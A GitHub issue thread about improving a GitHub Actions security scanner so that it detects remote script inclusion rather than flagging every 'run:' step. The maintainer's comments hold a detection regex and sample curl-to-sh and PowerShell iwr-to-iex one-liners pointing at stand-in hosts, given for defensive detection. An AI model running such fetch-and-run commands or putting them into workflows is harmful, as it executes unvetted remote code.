### ISSUE TITLE
_check_for_inline_script needs to do more than just grep for 'run'

### ISSUE THREAD

**Issue by 6mile** [bin3xish477/asa#2]
First, let me say, I think this project is awesome and I want to help make it better if I can.  :)

I'm creating this ticket as I wanted to have a discussion about how the ASA project identifies issues going forward.  I thought about creating a PR and adding some code myself but wanted to have a conversation first. 
 
I think the _check_for_inline_script function needs to be modified to do more than just check for the presence of 'run' in the action step.  I understand that the GitHub Action hardening guide calls out inline scripts, but there needs to be a delineation between say a bash script is called from a remote location versus a run command that executes a binary in a specific action, like, say semgrep or npm.  Right now, _check_for_inline_script will create a lot of false positives for many legitimate uses of the run action.  Just take a look at the Semgrep Action: https://semgrep.dev/docs/semgrep-ci/sample-ci-configs/#sample-github-actions-configuration-file or the NPM Action:  https://github.com/actions/setup-node.  And there are thousands of others where the Action calls an executable inside the docker container that Action maps to.  

tl;dr: 
The use of 'run:' by itself should not be a finding, but if 'run:' calls a script or other insecure mechanism, then it should absolutely be a finding.  

Let me know your thoughts.

**Comment by bin3xish477** [comment]
Yeah, I definitely agree, and that's why I assigned a level of `WARN` to the `check_for_inline_script`. The intention is to only notify the developer that they have an inline script so as to remind them that these are potentially dangerous. This is the reason I've added the `--ignore-warnings` argument to **ignore the checks that may be a bit noisy**. 

I could also just remove the `check_for_inline_script` because the `check_for_script_injection` check actually identifies the real security issue with using inline scripts which is when you directly include a dangerous `github.*` variable directly in the script as opposed to passed to the script as an environment variable or as an action input.

If you would like to commit some code, please free to do so !! 🙂

**Comment by bin3xish477** [comment]
I'm also going to be working on improving the granularity of some of these checks - this was only meant to be a Proof-of-Concept that I needed to create for an effort at my job to improve the security of our open-source projects.

**Comment by 6mile** [comment]
Yup, it's a great proof of concept, and as I said, I'm a fan, so don't think I was being critical.  :)

There are at least two issues with inline "scripts":  one is the script injection attack that you point out where a malicious actor takes advantage of people calling github.* variables directly without the use of the intermediary variable.  The second issue involves calling remote scripts, or other remote configurations that malicious actors could change without the person calling the script knowing.  This is akin to the classic ``` curl https://example.org/install.sh | sh ``` , but only worse, because the remote configuration is being called with automation (GitHub Actions) and the source can change at anytime without anyone knowing.

Soooo, all of that is to say that I think ``` check_for_inline_script ``` should stay, but in a modified form where it's actually looking for these remote file type attacks.  

We should also address if calling a script from inside the repo as part of the action is a separate detection or not.  

Lemme do some research on the best way to introduce this function and I'll circle back.

**Comment by bin3xish477** [comment]
That totally makes sense - we should be able to put together a regular expression regarding the remote script inclusion. Something along the lines of

```
.*(curl|wget|iwr|Invoke-WebRequest).*\|.*\s(sh|bash|iex|Invoke-Expression)
```

The regex should also look for remote PowerShell script inclusion and would catch string like these:

```
curl https://example.org/install.sh | sh
. { iwr -useb https://malicious.com/install.ps1 } | iex; install
```

But yeah, something like that would help identify dangerous remote scripts.

**Comment by bin3xish477** [comment]
Closing issue since [PR](https://github.com/bin3xish477/asa/pull/3) was created to address this issue.
